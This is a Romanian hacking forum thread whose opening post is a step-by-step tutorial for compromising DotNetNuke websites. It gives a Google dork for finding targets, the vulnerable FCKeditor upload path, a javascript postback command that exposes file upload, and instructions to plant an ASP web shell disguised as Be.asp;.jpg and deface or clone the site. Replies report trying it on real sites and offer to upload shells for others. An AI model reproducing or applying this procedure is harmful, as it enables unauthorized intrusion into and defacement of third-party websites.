Rhodium Posted December 22, 2012 Report Posted December 22, 2012 (edited) Acesta metoda se numeste DotNetNuke(DNN).1.Accesati google.ro si folositi acest dork:- :inurl:/tabid/36/language/en-US/Default.aspx2.Cautati un site vulnerabil si stergeti totul de dupa http://www.sitevulnerabil.com/ si copiati asta:/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx3.Acum aveti doua posibilitati.Daca va apare Link Gallery url ,inseamna ca siteul nu este vulnerabil.http://img208.imageshack.us/img208/9956/dnnu.jpgIar daca va apare o pagina ca in acesta fotografie atunci siteul este vulnerabil.4.In cazul in care gasiti un site vulnerabil treceti la urmatorul pas.5.Observati ca sunt 3 optiuni, dar noi vom selecta “File in your site”.6.Dupa ce am selectat, va trebuie sa folosim un "javascript code".Pentru asta va trebuie sa folosim un browser care suporta javascript.Asadar voi folosi Opera.Va trebuie sa alegem locatia fisierului ca fiind "root".Stergeti tot ce scris in browser si copiati acest cod.javascript:__doPostBack('ctlURL$cmdUpload','')7.Acum, dupa cum puteti vedea în imaginea de mai jos, vom avea optiunea de a incarca fi?iere.8.Nu puteti sa incarcati shell-ul direct in format .php.9.Asadar vom folosi un shell special care este codat un ASP.Il puteti descarca de aici:Be.asp;.jpg10.Dupa ce am descarcat shell-ul il vom uploada pe site.(sa nu schimbati extensia)11.Dupa ce a-ti incarcat fisierul puteti sa accesati shell-ul mergand la aceasta adresa: http://www.sitevulnerabil.com/portals/0/Be.asp;.jpg12.Acum va aparea ceva asemanator ca in imaginea de mai jos.http://img51.imageshack.us/img51/3481/shella.png13.Acum click pe <DIR>... pana cand veti gasi admin.14.Puteti sa editati siteul sau sa il clonati.In cazul in care acest tutorial va fost de folos puteti sa imi dati un like. Edited December 22, 2012 by Rhodium 1 Quote
geogeo2007 Posted December 22, 2012 Report Posted December 22, 2012 foarte folositor tutorialul, dar daca se poate sa postezi unul si pentru un exploit mai nou cu RFI in php. Quote
asparcilius Posted December 26, 2012 Report Posted December 26, 2012 am descoperit 1 rotel > Home ms ptr tutorial:D Quote
dr.d3v1l Posted December 26, 2012 Report Posted December 26, 2012 si cu google chrome faceti asa : f12 > console puneti script si ok Quote
Cheater Posted December 26, 2012 Report Posted December 26, 2012 (edited) Lol, e arbitrary file upload, metoda, e o panarama de cms cu fackeditor vechi, vulnerabil.DotNetNuke este un cms vulneabil si n-are nici o legatura cu metoda, sau cine stie de noua gaura din covrig descoperita.O postare mai buna ar fi una cum ca ai descoperit un arbitrary file upload, intr-un cms, tu, nu luata de pe net, postare realizata dupa ce ai raportat vulnerabilitatea la producator. Edited December 26, 2012 by Cheater Quote
BigNija Posted December 27, 2012 Report Posted December 27, 2012 (edited) Am incercat pe mai multe site-uri si primesc urmatoarea eroare:An Error Has Occurred When Attempting To Save The File E:\www\dzonny.cz(3b7cccb8694727720e8f126f1cb5ef85)\wwwroot\Portals\0\Be.asp.jpg. Please Contact Your Hosting Provider To Ensure The Appropriate Security Settings Have Been Enabled On The Server.sauAn Error Has Occurred When Attempting To Save The File C:\inetpub\wwwroot\DNN_Capetillo\Portals\0\Be.asp.jpg. Please Contact Your Hosting Provider To Ensure The Appropriate Security Settings Have Been Enabled On The Server. sauAn Error Has Occurred When Attempting To Save The File D:\www\rotel.ch\htdocs\Portals\0\Be.asp.jpg. Please Contact Your Hosting Provider To Ensure The Appropriate Security Settings Have Been Enabled On The Server.Gresesc eu cu ceva ? Edited December 27, 2012 by BigNija Quote
ady22sb Posted February 23, 2013 Report Posted February 23, 2013 bun tuorialul...pentru noi astia mai incepatori.la ma multePS. tocmai ce l-am ars pe unu cu o metoda asemanatoare. Quote
chioara3 Posted February 24, 2013 Report Posted February 24, 2013 Am facut tot ce trebuia... dar cand dau enter dupa ce am pus : /portals/0/Be.asp;.jpg nu-mi apare alea.. imi apare doar o imagine mica in centru pe care scrie image.Help plz. Quote
XoddX Posted February 24, 2013 Report Posted February 24, 2013 Am uploadat acel sheel dat de tine, am mers la adresa http://www.site-ulmeu.ro/portals/0/Be.asp;.jpg si imi apare:PozaOare am gresit undeva? Quote
chioara3 Posted February 24, 2013 Report Posted February 24, 2013 Exact asa imi apare si mie xodd.. Quote
Mr.Kode Posted February 24, 2013 Report Posted February 24, 2013 Am facut tot ce trebuia... dar cand dau enter dupa ce am pus : /portals/0/Be.asp;.jpg nu-mi apare alea.. imi apare doar o imagine mica in centru pe care scrie image.Help plz.Si mie tot asa.. Quote
chioara3 Posted February 24, 2013 Report Posted February 24, 2013 O sa caut in tutoriale si revin cu edit. Quote
nein Posted February 24, 2013 Report Posted February 24, 2013 (edited) e vechie metoda , chiar postata de mine de user DANISR [cand am loat ban ] https://rstforums.com/forum/30562-tutorial-dnn-deface.rst datimi pm cu siteurile dnn si va uploadez eu shell .. Edited February 24, 2013 by nein Quote
XoddX Posted February 24, 2013 Report Posted February 24, 2013 foarte bun!Foarte bun ce? Ai probat pe un site si a mers? Lasati comentariile aiurea pentru +1 Quote
TheArthist Posted February 24, 2013 Report Posted February 24, 2013 (edited) Nice.. Edited February 24, 2013 by TheArthist :) Quote
XoddX Posted February 25, 2013 Report Posted February 25, 2013 e vechie metoda , chiar postata de mine de user DANISR [cand am loat ban ] https://rstforums.com/forum/30562-tutorial-dnn-deface.rst datimi pm cu siteurile dnn si va uploadez eu shell ..Da-mi si mie un PM cum faci ca sa urci shell-ul... MC Quote
mafia27 Posted April 16, 2013 Report Posted April 16, 2013 ForbiddenYou do not have permission to access this document.Web Server at vluchtenburg.nlNu mi-a mers tutorialul Quote
d33nis Posted July 15, 2013 Report Posted July 15, 2013 e invechita metoda si nu mai este functionala. Quote